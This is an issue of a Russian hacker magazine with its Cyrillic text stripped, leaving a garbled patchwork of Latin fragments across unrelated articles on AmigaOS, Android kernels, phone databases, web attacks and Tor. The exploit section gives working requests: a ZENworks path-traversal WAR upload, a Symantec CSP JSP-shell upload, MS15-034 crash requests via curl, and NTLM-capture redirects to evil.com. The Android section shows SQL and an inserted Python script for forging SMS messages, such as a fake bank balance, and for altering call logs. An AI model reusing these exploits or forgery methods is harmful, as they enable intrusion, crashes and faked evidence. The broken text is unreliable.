OCS. CES Boing Ball , -
-
Lorraine
Blitter Copper
Agnus
Dual Playfield
-
-
,
,
Amiga. -
AmigaOS
Amiga
OCS
Agnus, Denise
Paula -
Commodore
Semiconductor Group
. - Motorola 68000 - Blitter Copper Agnus. - .
Amiga 1000. - . UNIX- - . , - . ( , - !), , - .
: - , . (runtime libraries) , . - - Exec , - AmigaOS, -, , - , - ... . SassenRanch : Exec AmigaOS .
runtime- Amiga 1000 -, Exec. , - Commodore. graphics.library intuition.library , - .
. Agnus Denise graphics. - OCS, , , graphics.library . - intuition.library - , , . - intuition Amiga Graphicraft, Musicraft Textcraft.
1985 Commodore Amiga 1000 ( . - : ) Commodore
, . , - AmigaOS ( ) - , Commodore MetaComCo, - TRIPOS - (DOS), - , Motorola 68000. AmigaOS - . - TRIPOS . TRIPOS dos.library. AmigaOS : TRIPOS BCPL (Basic Combined Programming Language) , (, - Hello, World BCPL).
AmigaOS dos.library - . Exec dos.library runtime-, - . , dos.library, . dos.library, ,
AmigaOS
-
,
-
AmigaOS
Exec
1985-
NT-
Windows
AmigaDOS -
INFO
AmigaOSRAMdrive.-
-.(PerryKivolowitz),Amiga,-.RRD(RecoverableRAMDisk)RAMdrive,
reboot.
AmigaDOS , - AmigaOS.
, AmigaOS . Motorola 68000, , - MMU (Memory Management Unit), - . , . -, . AmigaOS , . Guru meditation , AmigaOS .
AmigaDOS runtime- , Exec , - , , , . - ( -) devices.
, AmigaDOS trackdisk.device, floppy- (, , scsi.device). intuition input.device, , -, keyboard.device, serial.device gameport.device. AmigaDOS intuition console.device.
Kickstart, Workbench. , 2, - AmigaOS . -- Kickstart. PC - BIOS IPL. - Autoconfig. - . , - , . PCI plug and play, , - Autoconfig.
- - Exec. , AmigaOS, - (0000$
AmigaOS Exec -
,
WWW
AmigaOS (Hyperion Entertainment): www.amigaos.net
Amiga history: www.amigahistory.co.uk
AmigaOS software (Aminet): aminet.net
Amiga Demoscene Archive: ada.untergrund.net
Lorraine at CES 1984: https://www.youtube.com/watch?v=nLcpn1_IY1A
Shareware MUI: www.sasg.com/mui/
Open-source AROS: aros.sourceforge.net
MorphOS: morphos.de
, -
-
Kickstart ROM-
-
Amiga Workbench
,
Boing Ball
craft
Graphicraft
Textcraft
Workbench
0004), SysBase, Exec. , Exec - devices, - runtime , . , , , - . - Exec , , - . , - .
Amiga, 3,5- , Kickstart - AmigaOS . - ROM, Kickstart. AmigaOS - Kickstart.
- , Amiga softkickers, - Kickstart. , , - ( ), - .
AmigaOS , intuition, AmigaDOS - . - - !
- Insert Amiga Workbench. , Workbench, , -... , , , , , (), - ( ) crafts (). , , . Workbench Finder Apple Macintosh GEM, - CP/M Atari ST.
, . , 1.0 Workbench . , , . Workbench ,
AmigaOS , Amiga Workbench.
Workbench - . Workbench , GUI - .
- Amiga AmigaOS. (Stefan Stuntz) - MUI (Magic User Interface), AmigaOS -.
AmigaOS. , - , - AmigaOS, IBM PC? - Commodore . - , Amiga, -, - . , .
Commodore PC. , OCS , . Motorola - Intel, ECS (Enhanced Chip Set) Super Agnus Super Denise .
- - . OCS AGA (Advanced Graphic Architecture) 262 , . Amiga 1200 Amiga 4000 AGA NTSC PAL - - . , - -5 - .
AmigaOS - . - MS-DOS , Windows . -
-
MUI
-
Workbench
INFO
2001-Amiga.:,,Amiga3000.3D-VistaPro,-
-
.
INFO
Workbench1.2-.,
-AltShift-F1-SystemSoftware:Carl,Neil&Kodiak.
F2
:GraphicsSoftware:Dale,
Bart,Jim&=RJ=.
, NT AmigaOS: Executive - DLL-.
Commodore, AmigaOS - , - . , : Amiga , .
Amiga AmigaOS, - . 2005 AmigaOS, PowerPC. Hyperion Entertainment, AmigaOne, - , PowerPC - Pegasos II.
AmigaOS 4.x - Amiga, AROS (Amiga Research Operating System) . AROS
AmigaOS, 3.1 API. AROS - , AmigaOS, Commodore Amiga. , . Macintosh Operating System, Motorola PowerPC, Intel UNIX BSD. AROS AmigaOS - Intel x86-64, Motorola 68k PowerPC, - Linux, FreeBSD Windows host-. AROS - Zune MUI - .
AmigaOS MorphOS. Phase5 Digital Products, (turbo-), Amiga. (Ralph Schmidt) (Frank Mariak), PowerPC. - -. , AmigaOS - , AmigaOS, - . - . MorphOS Quark, - (boxes).
, ( ) MorphOS, A-Box , - ( ) AmigaOS. Q-Box, , - , OS X FreeBSD, PowerPC.
, , , - AROS MorphOS, - , Amiga . - . , . , , , - . , , - . - AmigaOS.
Open source
AROS -
AmigaOS,
MorphOS
AmigaOS -
.
Quark
MorphOS -
MUI -
. AROS,
Zune
(Francisco Franco) - Android-, - franco.kernel Nexus FKUpdater. -, - - , - - .
, Android- franco.kernel
androidstreet.net
BRADA
, , Nexus, . , - , , , franco.kernel , , . , - franco.kernel - - Nexus .
, , , - , - , . .
. -5 - , - ?1. , .2. - -
. .
3. .4.
.5. .
, . . , , - Android.
--: - CloudCar, Android Auto, 2014 - 2014 .
, Linux - . - Android LG P500. - , /sys /proc, - .
Android 2.2, - . Dalvik RAM-, - . Dalvik , . , - Dalvik /cache .
, , -
-
, : - Linux- Android- , -, -, . - ( ) , , franco.kernel.
CPU
FKUpdater: CPU GPU
, -. , Linux- , - - , . -.
Huawei X5. Qualcomm high end , 800 2000 . -, Nexus S, Galaxy Nexus. - FKUpdater. -, .
? , - - (governor) - ( ). - - . - (, ), .
, , - Nexus 6. 1,5 , -. , . , - . .
? -, Interactive Conservative 10 (0,01 ), - . , - 1,7 , , 40 (0,04 ). , 40 - , - ( 60 16 ).
, MPDecision. - .
, Conservative?
Interactive Conservative. , , Google, - Qualcomm ( - Snapdragon 805). -, , Conservative, , Ondemand, - .
InteractiveX, - leanKernel, ?InteractiveX Interactive - ( ). , , - Interactive Ondemand . -, , .
. - ? . - . - , X Y , .
, - , ? ?, , doubleTapToWake (- . . .) / , - - . , doubleTapToWake - , One Plus One Nexus 6, (, ).
, , Linux. - , - , .
CyanogenMod? CM, - , , , - . , Nexus 7 2012 , Nexus 5 6, , CM. Nexus 4 Nexus 7 2013 , - CyanogenMod.
Android ? -? userspace-, , Android ( ).
--,,-InteractiveOndemand
,---MPDecision
, , ioctl. -, - . , - , ioctl, . ( ).
API. , . Android , (, -, ) , - .
, CyanogenMod, - Nexus 4. Android 4.3 CyanogenMod HardwareComposer, , .
- , - . C ? - , . , , - . GSM- , .
... - . HTC One M8. Wi-Fi . -: OEM-
Google , , - . -.
, Nexus 4, - - . Qualcomm , .
- , -, , ? - , - Nexus 6 . , .
Nexus OnePlus One? ? ( , Google, Motorola Cyngn - ). , , .
? - , -.
? - ?, , Imoseyon ( leanKernel, - franco.kernel. . .) - . CodeAurora ( Qualcomm. . .) .
FKUpdater Google Play?, FKUpdater. - , 2011 . - . FKUpdater , , .
. . .
FKUpdater, : Peek , Active Display Motorola.
: , , ;
Per-App Modes - . , , GPU , , . root - ;
Servicely . Servicely, -, (, ). Servicely . -, ;
Nexus Display Control , RGB . Galaxy Nexus, Nexus 4 Nexus 5. ( franco.kernel);
Simple Reboot - (recovery, bootloader, etc.);
Simple CPU Monitor Extension DashClock, .
Google Play
,-,-
Photo: Andy Frith@shutterstock.com
.
SQLite,-Android.-db.,,.
root
,Android-. /data/data/__/databases.- () PlayMarket.
/data/data,-,RootExplorer., ,,SQLiteDebugger(goo.gl/W4Euvp),DBBrowser for SQLite (sqlitebrowser.org). BusyBoxsqlite3.Nexus55.1. , -,- SQLite Debugger, App.-?.
accounts.db /data/system/ /data/system/users/0 - , . accounts.db account,-.,().
authtokens ,Google,GMS-.extras,GoogleUserId/.,Talk,YouTube,URLshortener,Wallet.
,,,-.. Nexus 5 - Nexus 7 ( 5.1 flash-all.bat -w, root). -,,accounts.db(WhatsApp,APK1mobile.com).,-/data/system/users/0.
,-Google ., ,,Google+,,GoogleDrive,-,.PlayMarket, : rpc:s-7:aec-7.,-.
-: Viber,
; Facebook,-
; WhatsApp; ICQ,
; Pebble
; Dropbox; ..
,,-.
:-,accounts.db.
mmssms.db -. /data/data/com.android.providers.telephony/databases/. --.- 900 . mmssms.db,:ECMC684402.05.1512:49 450 210009 KARI : 3281.16. ,.-SQLiteDebugger.-sms.:
> SELECT _id, thread_id, address, date, body FROM sms WHERE address = 900
- ,.-.-(,).
, SELECT -,,,,,UNIX time
accounts.db
accounts.db
BRADA
(. mmssms.db).-. .Update value. . - .ECMC684405.05.1510:181000000ATM367700:1003731.16.-:
> UPDATE sms SET body = 'ECMC6844 05.05.15 10:18 1000000 ATM 367700 : 1003731.16' WHERE _id = 196
,- . (05.05.1510:18)date.UNIXtime-,-unixtimestamp(goo.gl/R1wv2a). 1430810300.date.
> UPDATE sms SET date = 1430810300000 WHERE _id = 196
, - . - Commit . , . mmssms.db , . -,,.
.-:threads,-()/, sms, ..1. .
sms - thread_id, -. mmssms.db, 7.,- . : thread_id/; address-; person ;date; read1 ,0; type1,2(04);body . , , :
-
mmssms.db
mmssms.db
> INSERT INTO sms (thread_id, address, date, read, type, body) VALUES (7, 900, strftime ('%s', 'now')*1000, 1, 1, "_")
strftime('%s','now')*1000-.UNIXtime. .2. -
. +7123456789, ,- (.).,- threads canonical_addresses. canonical_addresses,.
> INSERT INTO canonical_addresses (address) SELECT '+7123456789' WHERE NOT EXISTS (SELECT 1 FROM canonical_addresses WHERE address = '+7123456789')
/ threads.recipient_ids-_id,canonical_addresses,.
> INSERT INTO threads (message_count, recipient_ids, read) SELECT 1, MAX(_id)+1, 0 from threads
thread_id,recipient_ids,-recipient_idsthreads1(MAX(_id)+1).
> INSERT INTO sms(thread_id, address, date, read, type, body) SELECT max(_id), '+7123456789', strftime('%s', 'now')*1000, 0, 1, '_' FROM threads
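The three inserts above work, but the MAX(_id)+1 guess for recipient_ids only holds while threads and canonical_addresses happen to have been created in lockstep; on a phone that has deleted conversations it silently points the new thread at the wrong contact. The script below is an added example (not from the original article): it performs the same canonical_addresses -> threads -> sms sequence plus the two UPDATEs from the previous page through Python's sqlite3 module, stores the canonical address's real _id in recipient_ids, and keeps message_count and the thread date consistent. It runs against a minimal copy of the schema with only the columns the article names (an assumption: a real mmssms.db has many more); pointing open_db at a pulled mmssms.db and skipping the schema step is the on-device version.

```python
"""mmssms.db: add an SMS to a new or existing thread, and rewrite one.

Added example, not from the original article. It performs the three
inserts shown above (canonical_addresses -> threads -> sms) and the two
UPDATEs from the previous page, but against a minimal copy of the schema
holding only the columns the article names (an assumption: a real
mmssms.db has many more), and it stores the canonical address's real _id
in threads.recipient_ids instead of guessing MAX(_id)+1. Dates are epoch
milliseconds, as the date column expects.
"""
import calendar
import sqlite3
import time

INBOX, SENT = 1, 2          # sms.type values the article lists

SCHEMA = """
CREATE TABLE canonical_addresses (_id INTEGER PRIMARY KEY, address TEXT);
CREATE TABLE threads (_id INTEGER PRIMARY KEY, date INTEGER, message_count INTEGER DEFAULT 0,
                      recipient_ids TEXT, read INTEGER DEFAULT 1);
CREATE TABLE sms (_id INTEGER PRIMARY KEY, thread_id INTEGER, address TEXT, person INTEGER,
                  date INTEGER, read INTEGER DEFAULT 0, type INTEGER, body TEXT);
"""


def open_db(path: str = ":memory:") -> sqlite3.Connection:
    """Fresh database with the reduced schema; a pulled mmssms.db would be opened without it."""
    conn = sqlite3.connect(path)
    conn.executescript(SCHEMA)
    return conn


def to_ms(datestr: str, fmt: str = "%d.%m.%y %H:%M") -> int:
    """'05.05.15 10:18' -> epoch milliseconds (interpreted as UTC)."""
    return calendar.timegm(time.strptime(datestr, fmt)) * 1000


def canonical_id(conn, address: str) -> int:
    """_id of the address in canonical_addresses, inserting it on first sight."""
    row = conn.execute("SELECT _id FROM canonical_addresses WHERE address = ?", (address,)).fetchone()
    if row:
        return row[0]
    return conn.execute("INSERT INTO canonical_addresses (address) VALUES (?)", (address,)).lastrowid


def thread_for(conn, address: str, ts_ms: int) -> int:
    """Single-recipient thread for address; recipient_ids holds the canonical _id as text."""
    cid = str(canonical_id(conn, address))
    row = conn.execute("SELECT _id FROM threads WHERE recipient_ids = ?", (cid,)).fetchone()
    if row:
        return row[0]
    return conn.execute(
        "INSERT INTO threads (date, message_count, recipient_ids, read) VALUES (?, 0, ?, 1)",
        (ts_ms, cid)).lastrowid


def insert_sms(conn, address: str, body: str, msg_type: int = INBOX,
               ts_ms: int = None, read: int = 0) -> tuple:
    """Insert a message and keep the thread's counters consistent. Returns (sms_id, thread_id)."""
    if ts_ms is None:
        ts_ms = int(time.time() * 1000)
    tid = thread_for(conn, address, ts_ms)
    sms_id = conn.execute(
        "INSERT INTO sms (thread_id, address, date, read, type, body) VALUES (?, ?, ?, ?, ?, ?)",
        (tid, address, ts_ms, read, msg_type, body)).lastrowid
    conn.execute("UPDATE threads SET message_count = message_count + 1, date = ?, read = ? WHERE _id = ?",
                 (ts_ms, read, tid))
    conn.commit()
    return sms_id, tid


def rewrite_sms(conn, sms_id: int, body: str, ts_ms: int) -> None:
    """The two UPDATEs from the previous page in one transaction (the commit is what was easy to forget)."""
    conn.execute("UPDATE sms SET body = ?, date = ? WHERE _id = ?", (body, ts_ms, sms_id))
    conn.commit()
```

to_ms() interprets the timestamp as UTC; the value the article obtained from an online converter for the same wall-clock time differs by the converter's local offset, which is exactly the kind of detail a forensic examiner checks when a message's stored date does not match the phone's time zone.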
-..
,-.Proofofconcept:
Variable Query. :-
/,/-(1/2),.
-canonical_addresses..UNIXtime.-%Time0.
,.
-ScriptRunShellRoot:
$ /system/xbin/sqlite3 /data/data/com.android.providers.telephony/databases/mmssms.db "INSERT INTO sms(thread_id, address, date, read, type, body) VALUES (7, 900, strftime('%s', 'now')*1000, 1, 1, '_')"
contacts2.db /data/data/com.android.providers.contacts/databases/.
,--.accounts (, facebook,vk, whatsapp, viber). , .
, - -. , . ()62015,10:23 0 0 (. contacts2.db).
calls , ( 364) , , -,.UNIXtime,-,2-.. (. ):
> UPDATE calls SET date = 1430829536000, duration = 1524 WHERE _id = 364
,.,,,SQLite-. telephony.db,,
,S-..-,(com.android.telephony).
barcode_scanner_history.db-BarcodeScanner/-(goo.gl/eWAiom).,---(com.google.zxing.client.android).
btopp.dbBluetooth,-MAC(com.android.bluetooth).
calendar.db(com.android.providers.calendar).
external.db internal.db,/sdcard,:system,data(com.android.providers.media).
google_analytics,GoogleAnalytics. keep.dbGoogleKeep.191,,
,Pebble,(com.google.android.keep).
mail.db.(ru.yandex.mail). music.db,/-GooglePlayMusic(
com.google.android.music). reminders.db,GoogleNow.
,GooglePlay(com.google.android.gms).
user_dict.db().-(com.android.providers.userdictionary).
viber_messages.db(com.viber.voip).
threads_db2.dbcontacts_db2.db Facebook(com.facebook.katana).
vk.db.,,.,,vk.com/idXXXX.,-(com.vkontakte.android).
(. contacts2.db)- , ().-.-:
> INSERT INTO calls(number, date, duration, type) VALUES ("+71234567890", strftime('%s', 'now')*1000, 89, 1)
(.),. -
contacts2.db
-
INFO
demosfenus SQL-
.
-
,. ( ),dialer.db.
,-,-, . .
msgstore.dbWhatsApp,/data/data/com.whatsapp/databases. chat_list -,threads-. messagesdata.wa.db. , WhatsApp .messagesSQL-:
> UPDATE messages SET data = "_" WHERE _id = ___
WhatsApp.,-.
settings.db/data/data/com.android.providers.settings-, . -.-, -. ,.:global,systemsecure.. adb_enabledUSB. airplane_mode_radios
,-.
always_finish_activities(activities),.
usb_mass_storage_enabledUSB-.
wifi_sleep_policyWi-Fi-().
wifi_watchdog_on/Wi-FiWatchdog().
bluetooth_discoverability_timeout-Bluetooth.
end_button_behavior,.
font_scale. setup_wizard_has_run
/-.
android_id ,64-(hex-),-.
location_mode skip_first_use_hints1,-
status_bar_show_battery_percent-.
audio_safe_volume_state-.
bugreport_in_power_menu-.
( API) developer.
android.com(goo.gl/WTsf9v).-settingscontent.-,(si -):
$ adb shell content insert --uri content://settings/system --bind name:s:status_bar_show_battery_percent --bind value:i:1
-c4.4+.(goo.gl/SH9zeP).,,1,0, .
, -/ . -lockscreen.password_typelock_pattern_autolock./data/system/locksettings.db.
,-. -, , , . - , , ,. / , -(5.0), , ,adbpull,,- 1520. - , , , -.
. , -. ,, 3,74 (,Apple).
, , , Android(iOS)- . lowend Mediatek,,---.
Defy- . -, 1 , - (, , ), . Defy -Nexus4,,(1500- 2100 ). ,,,- NFC , -.
, - , , - .,Feedly, , . Defy-.,Android4.0/5.0, HTML .
, FeedMe, Java, -. ,- -,,.
-Android-,-.,-.MotorolaDefy,,-,,-iPhone.,--,,--,20082009.
OperaMini, , . OsmAnd(OpenStreetMap),-GhostCommander, --Twidere,.-,,-,.
GooGle Google, , ,,--.Google- , , .
- . - , .:GooglePlay,GmailGoogleKeep. , , , ? ,,?,-,,,-?.
, - gapps-pico, GooglePlayGoogleServicesFramework,- Google . - . - 1Mobile Market GooglePlay,Gmail,-Gmail (,,Inbox).
, --,., , - - Linux 2.4. KDE3, - - , KDE5,.,BeOS,- - . ,, . MeeGo Linux Nokia N900.,,,iOS. -, iPhone4, , -.,.
,:MotorolaDefy , - Motorola Droid II TI OMAP 3 1,2 (1),512-
,3,7-,-Android2.1. -,- - low low end. CyanogenMod 11 , (,Defy-,- kexec ). ,-DefyNexus4.,.
3,74.60, , -. -, ,-(Nexus4GalaxyNexus)-.
,- , ,,.
androidstreet.net
APK #8.
AndroguArd Apktool (goo.gl/LdB4V7) / -, Androguard (goo.gl/bdBlRu) - . , Androguard Python-, - . Androapkinfo , androdd , androdiff , , androlyze DEX- . .
Androguard , - , , , - . , - , - - -, , VirusTotal, Google.
SmAlideASmalidea (goo.gl/EWmB1z) IDEA / Android Studio, - , smali. . backsmali (goo.gl/ikzOQS) APK-, - Android Studio, DEX .
smali, -, - , , ART, Dalvik Android 5.0. - smali- , Android- .
SimPlify , -. , - . , Simplify (goo.gl/ff0cNm) . Simplify , , - smali- , , , , , .
, Simplify - , - / .
, ! , . . , , . , : - , IDEA- smali- , Android- Sony Mobile. , , - .
APKAnAlyzer Apktool Angroguard , ApkAnalyzer (goo.gl/byFUq) Sony Mobile . Java- , -- . - APK-, smali-, (, ).
: /
; XML- -
; -
; logcat; ODEX ; ; (
ELF-).
, , , Java- JD-GUI (jd.benow.ca) APK Studio (apkstudio.codeplex.com), / APK- , Java-.
ApkAnalyzer
-
Smalidea
Easy Hack
GreenDog , Digital [email protected],twitter.com/antyurin
ViewState aSP.Net , Easy Hack - Microsoft. , ASP.NET. , - OWASP top 10 (SQLi, CSRF, XSS ) , , - .
ASP.NET ViewState. . - . - ASP.NET. , - . -
WARNING
- . ,
, -
.
postback. , ( URL), . ViewState. - . - ViewState , .
ViewState Base64 - , (__VIEWSTATE).
ViewState. -, reflected XSS. XSS Auditor - Base64, - ViewState . -, , -. , .
ViewState, Microsoft MAC (Message Authentication Code). , , . , - Base64 . ViewState - , , , , .
, . , MAC . - , MAC . -, . -, , . - , - -. -, - .
, MAC, Base64 . , , MAC , , .
Burp Proxy Response ViewState. (. ) , MAC.
ViewState
XXe JSON, - XXE - . XXE 2000-, ( Server Side Request Forgery). XXE - .
XXE , XML - Document Type Definition (DTD) - (inline DTD), -. , , , libxml,
(PHP, Python, Perl), inline DTD.
, , - , , - .
, NetSPI (goo.gl/ol9GAq), XXE.
, - (web service). , - -. . ( HTML), - .
- , - . - . . , , , , REST, SOAP, XML JSON. (endpoints) , (/webservice/json, /webservice/soap ).
NetSPI , - - , Content-Type. - endpoint JSON, Content-Type: application/xml, XML, , XXE. -, .
- XML, - . JSON :
{"search":"name","value":"netspitest"}
XML :
namenetspitest
- . , . Content-Type, XML
proof of concept, . - C dummy, .
: , , . UAC , , , -.
, Windows. !
-, . -, - WebDAV SMB. , , - . , MS08-68 . , , , , , HTTP, SMB.
-, NTLM Relay , - SYSTEM , - . , , , .
Microsoft, , - -. SMB, - . , , .
wiNdOwS NtLM-
HttP SMB
, NTLM-. , - Microsoft, , . -.
. Windows NTLM, challenge-response:
1. .
2. (challenge).
3. challenge ( NT- , ) .
4. .
, .
, - . relay-. , , .
, NTLMv2, , -, . , NTLM , HTTP, Telnet, POP3, FTP, SMB .
Windows. , -. SMB HTTP. UNC- (, \\evil\test), 445- (SMB) - , evil .
- SMB Relay. , . , , , RCE. MS08-68.
- . - NTLM- (goo.gl/AQbSNM).
.
1. WebDAV ( HTTP) NTLM. 1024, , .
2. ( NT AUTHORITY\SYSTEM) WebDAV (\\127.0.0.1:8080\test.txt).
3. , - .
4. .
5. -! .
$IPC ( ).
WebDAV , SMB. WebDAV , - UNC- (\\127.0.0.1:8080\test.txt). - WebDAV Windows , (Windows 7, 8 8.1) , WebDAV. , - .
Windows Defender. SYSTEM. Windows, , , .
WebDAV ,
SYSTEM
Windows WebDAV
NTLM- ( NTLM). white paper (goo.gl/Q1Uz5A), - - .
NTLM- NTLM-. , , ,
SOP SwF FLeX SdK data="https://victim.com/badflex.swf ">
2. , victim.com .
3. , , victim.com, Flash, http://evil.com/sender.swf.
4. Flash , sender.swf, ( victim.com) evil.com, crossdomain.xml.
5. crossdomain.xml victim.com, - sender.swf.
6. sender.swf victim.com.
7. sender.swf
victim.com . SOP , sender.swf victim.com.
, - , CSRF .
, , swf. ParrotNG, , Burp, SWF.
. UNC- SMB, HTTP. , - Intranet. , , - , . , http://evil/ Intranet, http://evil.com/ Internet. , - NTLM-, ( , , ). - NTLM-, , . IP- - Internet ( ).
. ( ), - , IE.
- , - HTTP. , man-in-the-middle . . , -.
. , - antivir.ru. antivir.ru NTLM-, , Internet. - http://evil/ .
. , - SMB. HTTP , NTLM.
:
HTTP/1.1 302 Found
Content-Type: text/html
Location: file://evil.com/ntlm_catcher
, - API, .
, , , , , . , , , MS . .
Flash crossdomain.xml, , - SOP (Same-origin policy). SOP Flash. Troopers 2015 Minded Security NibbleSec (goo.gl/JRBwJ4).
Troopers, . - SOP Flash? , Adobe , , - . , -, .
, , Flash , crossdomain.xml . . - .
Flex SDK, - Flash. 3.1 - (). . - flashvars (-, - ) resourceModuleURLs. , - , . . , - - , .
, Flash, Flex SDK , -, SDK -. -, Flex SDK, .
, , , , - Flex SDK, , 4.5.1. , , , . , - , - - , Google. , , Flex SDK.
. , victim.com, - (badflex.swf), - Flex SDK. evil.com - - (sender.swf), victim.com, crossdomain.xml - victim.com.1. evil.com, -
victim.com. - resourceModuleURLs. - :
Novell ZeNworks CVSSv2: N/A : 8 2015 : Pedro Ribeiro CVE: 2015-0779
Novell ZENworks Configuration Management (ZCM, ZENworks Suite). UploadServlet - uid (../). WAR- Tomcat -. WAR Web Archive Web Application Archive,
Java -. , . , - http.sys.
, , - - Java- JAR ZIP. WAR:
/index.html
/guestbook.jsp
/images/logo.png
/WEB-INF/web.xml
/WEB-INF/classes/org/wikipedia/Util.class
/WEB-INF/classes/org/wikipedia/MainServlet.class
/WEB-INF/lib/util.jar
/META-INF/MANIFEST.MF
EXPLOIT : WAR-, :
dukeBarman [email protected],
@dukebarman, dukebarman.pro
POST /zenworks/UploadServlet?uid=../../../opt/novell/zenworks/share/tomcat/webapps/&filename=payload.war
Metasploit.
msf exploit(zenworks_configuration_management_upload) > rexploit
ZCM. , ZDI-10-078/OSVDB-63412, .
TARGETS ZENworks Configuration Management

...
if (index > 0)
    agentName = filename.substring(24, index);
else
    agentName = filename.substring(24);
String date = mFormat.format(mParser.parse(filename.substring(0, 8)));
String parentFolder = (new StringBuilder())
    .append(SisProperties.getBulkLogDir()).append(FILE_SEP)
    .append(agentName).append(FILE_SEP).append(date).toString();
File parent = new File(parentFolder);
if (!parent.isDirectory())
    parent.delete();
parent.mkdirs();
file = new File(parentFolder, filename);
return file;
Throwable th;
th;
throw new IllegalArgumentException((new StringBuilder())
    .append("Corrupted bulk log filename [").append(filename)
    .append("]!!").toString(), th);
}
...
, 24- . - filename . - (), :
LOG_ROOT/AGENT_NAME/FORMATTED_DATE
parent.mkdirs(). - .
EXPLOIT . , /register, GUID,
. YYYY-MM-DD/YYYYMMDD,
YYYYMMDD YYYY-MM-DD . , . - .
servlet : YYYYMMDD/../../../././././PATH_FROM_TOMCAT. - JSP-.
( , ) - (bit.ly/1IotJe3) . . - , :
...19991111est3X1999-11-11/19991111/
.4test5test6.jsp
:
...19991111/../../../././././tomcat/symapps/agent/sis-agent/jspshellS2.jsp
. -:
req1 = """POST /sis-agent/""" + action + """ HTTP/1.1
Host: """ + host + """
Accept: */*
Appfire-Format-Version: 1.0
Content-Type: application/x-appfire
AppFire-Charset: UTF-8
AppFire-GUID: """ + guid + """
Content-Length: """ + str(len(body)) + """
action bulk-log; guid GUID ; str(len(body)) .
(Properties):
headers="Data-Format=text/plain\x0aData-Type=properties\x0aData-Length=%d\x0a\x0a" % (len(properties))
:
"file.name":__
JSP-
JSP-
:
headers="Data-Format=binary/zip\x0aData-Type=policy\x0aData-Length=%d\x0a\x0a" % (len(bin))
JSP- Metasploit. , jspshell.jsp. update.py.
, , . -, SCSP , - . - - .
- , (bit.ly/1IVLQan).
TARGETSSymantec Critical System Protection Server
IIS
Range Length
-
-
Range
HTTP-
HTTP-
TcpSegment
1. HTTP-
2.
Range
3. Range Tail
4.
5.
. .
, Range Length 284 0xFFFFFFFFFFFFFEE4. , .
HTTP- UlAdjustRangesToContentSize(). Range, . -, , Range - . -.
[Figure: range end position compared (>=) against 0xFFFFFFFFFFFFFFFF]
. - Range (. ).
284, 0xFFFFFFFFFFFFFEE4, . .
, -. , , UxpTpDirectTransmit(), . .
, :
Range Count = 1;
Range Boundary and Range Info length = 0;
Range Tail Boundary Length = 0;
Range Length = 0xFFFFFEE4;
HTTP Head Length = 283;
, 0xFFFFFFFF (4G). , . , - . 284 .
HTTP Response Length = HTTP Head Length + (Range End Position - Range Start Position + 1)
                     = HTTP Head Length + (0xFFFFFFFF - Range Start Position + 1)
                     = HTTP Head Length - Range Start Position
Range Start Position HTTP , . , HTTP Response Length HTTP Head Length.
DoS, , HTTP Content Length . Range Start Position - HTTP Head Length + 1 . HTTP Content Length DoS-.
HTTP- , http.sys - . TcpSegmentTcbSend() tcpip.sys . (. ).
15 . HTTP Response Length 0xFFFFFFFF. Virtual address -
EXPLOIT ( ):
GET / HTTP/1.1
Host: site.com
Range: bytes=0-18446744073709551615
- : (bit.ly/1KvJDRc); Python (bit.ly/1cjO8mC).
:
curl -v SERVER_IP -H "Host: anything" -H "Range: bytes=0-18446744073709551615"
-, bash . , - :).
ITW- - . ( ESET):
GET /%7Bwelcome.png HTTP/1.1
User-Agent: Wget/1.13.4 (linux-gnu)
Accept: */*
Host: [server-ip]
Connection: Keep-Alive
Range: bytes=18-18446744073709551615
TARGETSWindows- MS15-034.
SOLUTION .
7.
PHP
(>=0x80000000). HTTP Response Length - , . virtual address . partial memory descriptor list (MDL) (bit.ly/1zODcs4). , BSOD.
-.
"GET /iisstart.htm HTTP/1.1\r\nHost: aaaaa\r\nRange: bytes=3-18446744073709551615, 1-600" + "\r\n\r\n"
(Range): Range1: 3-18 446 744 073 709 551 615; Range2: 1-600.
UlpParseRange() :
Range1 Length = 0xFFFFFFFFFFFFFFFF - 0x3 + 1 = 0xFFFFFFFFFFFFFFFD
Range2 Length = 600 - 1 + 1 = 600
HTTP UlAdjustRangesToContentSize(). Range1 (3 + 0xFFFFFFFFFFFFFFFD => 0) , . Range2, , .
, - UxpTpDirectTransmit().
Range Count = 2
Range1 Length = 0xFFFFFFFFFFFFFFFD
Range2 Length = 600
Http Head Length = 0x127                         // HTTP head content, 1
Range1 Boundary and Range1 Info length = 0x7a
Range2 Boundary and Range2 Info length = 0x69
Range Tail Boundary Length = 0x32;               // 3
Range, (boundary) (Content-Type, Content-Range) Range ( 2).
HTTP- , :
HTTP Response Length = HTTP Head Length + Range1 Boundary and Range1 Info length + Range1 Length
                     + Range2 Boundary and Range2 Info length + Range2 Length + Range Tail Boundary Length
                     = 0x127 + 0x7a + 0xFFFFFFFD + 0x69 + 0x258 + 0x32 => 0x491 (mod 2^32)
- 0xFFFFFFFD. - 0x491 HTTP-. .
tcpip.sys . HTTP-. 0x491. , 0xFFFFFFFD ( 7). Length - Remain Length 0x2f0 (0x491 - 0x127 - 0x7a). : [0x3, 0x3 + 0x2f0]. - 0x2b6. .
, . - :
"GET /iisstart.htm HTTP/1.1\r\nHost: aaaaa\r\nRange: bytes=3-18446744073709551615,1-32,32-64,64-96,96-128,128-256,129-130,130-140,160-170,180-190,190-200" + "\r\n\r\n"
- BSOD, - . - .
6. -
WARNING
-
. , -
, -
.
Tor:
@difezza, defec.ru
,
,-,.- , ,, , ,,DreadPirateRoberts.
SilkRoad(20112013)Tor15,--.,200-.
2013 ,, -,.- .
- , -:,- . , , SilkRoad-.-, .
, , 400 onion- -,-SilkRoad2.0.
, -,-.,onion-,Tor , -, -.-,-.
2016 - (Nick Bilton), ,, . , - ,,-.Wired(www.wired.com/2015/04/silk-road-1), -.
Onymous, - (European Cybercrime Centre, EC3), , - (the U. S. Immigration and CustomsEnforcement,ICE),-(HomelandSecurityInvestigations,HSI)(Eurojust), 17, - ,410. : https://www.europol.europa.eu/content/global-action-against-dark-markets-tor-network.
Silk Road
onymouS
Silk Road
Onymous onion-
Tor, -
,
Silk Road
Silk Road.
Tor
?Tor?,,.,-,.,,-!?,.
, , -,,.
, - Tor -.-:().
, -? NSA ,Firefox,TorBrowser.,-NSA,-,-.
( , ?) , -,- . , , Flash , -.TorBrowser-,Flash-.
, -HTML5,-, , , - . WebRTC, -HTML5,Flash IP-.STUN-, WebRTC, - Tor -.TorBrowser.
Tor-,, , -,PoC., , ,-.
- , -NetFlow(www.cs.columbia.edu/~sc2516/papers/pam2014-tor-nfattack.pdf). -,- NetFlow- ,Tor . NetFlow- -: ; ; ; ; ; ; ; IP; TypeofService; TCP--
; ; .
,,-,
NSA -
Tor
Flash
IP-
Tor-
-NSA, - Tor-, -:
